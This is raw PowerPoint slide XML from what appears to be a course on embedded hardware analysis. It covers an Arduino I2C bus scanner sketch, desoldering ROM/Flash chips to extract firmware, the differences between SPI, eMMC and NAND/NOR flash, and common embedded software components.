                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>You can do this on SPI and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Canbus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> also.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B75621A7-D637-4549-84FB-C5F529A0859C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1392363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30882"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1839692"/>
            <a:ext cx="11582400" cy="4663440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// scan i2c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="18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800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Wire.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>measurementDelay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= 5000;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="18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800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>maxAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= 127;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="18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800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Serial.begin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(9600);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Wire.begin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="18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800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  byte err, address;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>num_devices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial"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75621A7-D637-4549-84FB-C5F529A0859C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3857926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230882"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333476" y="1692910"/>
            <a:ext cx="11582400" cy="46634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for (address = 1; address &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>maxAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;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err=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(err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num_devices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("i2c device found at 0x");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      if (address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(address, HEX);</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if (err == 4)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("i2c error at 0x");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      if (address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(address, HEX);</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num_devices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devices");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measurementDelay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B75621A7-D637-4549-84FB-C5F529A0859C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3594667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36525"/>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Desolder a ROM and extract contents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1281590"/>
            <a:ext cx="11582400" cy="4908896"/>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One way to extract software is to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>desolder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> the ROMs or Flash chips on the board and connect them to a device that reads its contents.  We saw an example of this in the electronics section for a (small) ROM that uses the I2C protocol.  </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We can use a “hot air” or IR de-soldering station to remove the chips but we need to be very careful not to damage the chip.  Hint: It’s often a good idea to preheat the entire board to about 150C.  This reduces heat conduction when you try to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>desolder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>; it may save a few chips from damage.</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A bigger challenge is presented by the variety of ROM/Flash chips including</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Simple SPI interface ROM chips (usually &lt; 64MB) with 8 pins.  This is similar to the I2C example we already presented (but with a different wire protocol described in the electronics section).  This is basically the same as the I2C ROMs we looked at only with SPI so we wont say any more.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>eMMC chips with controllers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>NAND/NOR Flash.  You’ll find these in mobile phones, for example. NAND/NOR flash is usually *not* read only. The problem with it is, that it does not have a controller, therefore the logic to manage it is integrated in the SOC. SOCs have often different ECC algorithms, which makes it more complicated to analyze them.</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E981CE2-0D96-284F-8ACC-25C2E4F8362F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273195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80376"/>
            <a:ext cx="10850880" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Extracting ROM/Flash contents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276124" y="1431235"/>
            <a:ext cx="11611076" cy="510767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eMMC chips have on board controllers and can be (relatively easily) read with an Arduino or a custom device (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ODROID USB3.0 eMMC Module Writer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRP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NAND/NOR based read only memory is much trickier.  First, most have 48 pins so a simple Arduino interface is not possible.</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NAND writes are asymmetric (writing a 1 is harder than writing a 0) and NAND memory locations are touchy so most NAND chips have ”error correcting” memory and even directories that  “map out” bad sections.  NAND controllers are complicated and NAND devices do not usually have on chip controllers so you need special devices to read the NAND like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ALLSOCKET IC Programming Adapter, eMCP221 IC Reader with SD Interface FBGA221 Adapter[IC Size 11.5x13mm] NAND FLASH Memory Mobile Chip-off Data Recovery socket.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See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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https://user.eng.umd.edu/~blj/CS-590.26/micron-tn2919.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. for more information about NAND.</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Writing requires specialized hardware controllers (not on the FLASH package), see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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http://ww1.microchip.com/downloads/en/AppNotes/Atmel-2575-C-Functions-for-Reading-and-Writing-to-Flash-Memory_ApplicationNote_AVR106.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"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https://www.gillware.com/data-recovery-services/flash-storage-data-recovery/usb-drive-data-recovery/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a: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This set of tools takes care of most BGA eMMC chips: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"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https://www.martview.com/emmc-emcp-socket-2-in-1-emmc-emcp-socket-usb3-0-superspeed-usd-emmc-reader-for-emmc-dongle.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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E981CE2-0D96-284F-8ACC-25C2E4F8362F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83945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3983"/>
            <a:ext cx="11393714" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Software components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="798284" y="1875473"/>
            <a:ext cx="4916716" cy="4663440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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OS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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Linux</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VxWorks</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Cisco IOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-US"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s-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bootloaders</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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U-Boot</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RedBoot</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BareBox </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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DC8ED47B-F13B-8A46-83D3-7C15A495D96B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5983941" y="1875473"/>
            <a:ext cx="5409775"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Libs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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busybox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> + uClibc</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buildroot</a:t>
            </a:r>
